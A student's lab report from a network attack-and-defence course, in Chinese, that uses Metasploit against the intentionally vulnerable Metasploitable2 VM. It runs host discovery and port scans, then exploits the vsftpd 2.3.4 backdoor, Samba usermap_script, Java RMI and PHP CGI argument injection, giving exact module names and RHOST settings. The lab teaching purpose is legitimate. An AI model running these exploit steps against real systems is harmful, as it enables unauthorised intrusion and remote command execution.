20222323 2024-2025-1 《網路與系統攻防技術》實驗六實驗報告

超高校级的绝望發表於2024-11-16

1.實驗內容

掌握metasploit的用法。
下載官方靶機Metasploitable2,完成下面實驗內容。
(1)前期滲透

①主機發現(可用Aux中的arp_sweep,search一下就可以use)

②埠掃描:可以直接用nmap,也可以用Aux中的portscan/tcp等。

③選做:也可以掃系統版本、漏洞等。

(2)Vsftpd原始碼包後門漏洞(21埠)

(3)SambaMS-RPC Shell命令注入漏洞(埠139)

(4)Java RMI SERVER命令執行漏洞(1099埠)

(5)PHP CGI引數執行注入漏洞(80埠)

2.實驗過程

下載過程參照官方指導書,此處不再贅述。

(1)前期滲透
①主機發現:
先檢查主機是否能ping通靶機:

檢視靶機ip地址:

用主機ping靶機:

進入msfconsole控制檯:

使用search arp_sweep進行搜尋:

use 0後檢視所需引數,show options:

設定靶機IP:set rhosts 192.168.1.102
執行run:

掃描到了靶機

②埠掃描:
使用portscan:
search portscan/tcp,use 0後show options:

設定目的埠、靶機IP等引數後執行:

掃描到了0-65535中的以下埠:

③掃描目標http伺服器的版本資訊:

use auxiliary/scanner/http/http_version,set RHOST 192.168.1.102,然後run:

(2)Vsftpd原始碼包後門漏洞(21埠)

漏洞原理:在特定版本的vsftpd伺服器程式中,被人惡意植入程式碼,當使用者名稱以“😃”為結尾,伺服器就會在6200埠監聽,並且能夠執行任意程式碼。

利用步驟:

在kali中執行msfconsole 啟動metasploit

use exploit/unix/ftp/vsftpd_234_backdoor 選擇漏洞:

set RHOST 192.168.1.102 設定要攻擊的機器IP(靶機IP):

exploit/run 開始攻擊
利用成功,執行uname –a、 pwd、 id等命令 驗證

(3)SambaMS-RPC Shell命令注入漏洞(埠139)

漏洞原理:Samba中負責在SAM資料庫更新使用者口令的程式碼未經過濾便將使用者輸入傳輸給了/bin/sh。如果在呼叫smb.conf中定義的外部指令碼時,透過對/bin/sh的MS-RPC呼叫提交了惡意輸入的話,就可能允許攻擊者以nobody使用者的許可權執行任意命令。

use exploit/multi/samba/usermap_script 選擇漏洞:

set RHOST 192.168.1.102設定要攻擊的機器IP(靶機IP):

exploit 開始攻擊

利用成功 執行uname–a驗證:

(4)Java RMI SERVER命令執行漏洞(1099埠)

漏洞原理:Java RMI Server的RMI登錄檔和RMI啟用服務的預設配置存在安全漏洞,可被利用導致程式碼執行。

操作步驟:

首先檢視1099埠是否開啟。

然後在MSF中:
use exploit/multi/misc/java_rmi_server

show options 檢視配置引數

set RHOST (靶機IP) 192.168.1.102

exploit/run

sessions -i id

shell (進入meterpreter時,使用whoami驗證下)

(5)PHP CGI引數執行注入漏洞(80埠)

漏洞原理:CGI指令碼沒有正確處理請求引數,導致原始碼洩露,允許遠端攻擊者在請求引數中插入執行命令。

在kali中執行msfconsole,啟動metasploit

use exploit/multi/http/php_cgi_arg_injection 選擇漏洞

set RHOST 192.168.1.102 設定要攻擊的機器IP

exploit/run 開始攻擊

shell後ls進行驗證:

3.問題及解決方案

  • 問題1:第四步whoami驗證時顯示命令不存在

  • 問題1解決方案:whoami這個命令只在shell中存在,之前我是把shell關了所以不能用whoami

4.學習感悟、思考等

透過本次Metasploit的實踐學習,我深刻體會到了滲透測試的重要性以及Metasploit在其中的強大作用。從主機發現到埠掃描,再到具體漏洞的利用,每一步都讓我對網路安全有了更深入的理解。特別是在利用Vsftpd後門漏洞、Samba MS-RPC漏洞、Java RMI SERVER漏洞以及PHP CGI引數執行注入漏洞時,我深刻感受到了攻擊者可能利用的多種途徑和手法。同時,我也意識到,網路安全需要不斷學習和更新知識,以應對不斷變化的威脅環境。這次實踐不僅提升了我的技術能力,更讓我對網路安全有了更加全面的認識。

參考資料

https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/

相關文章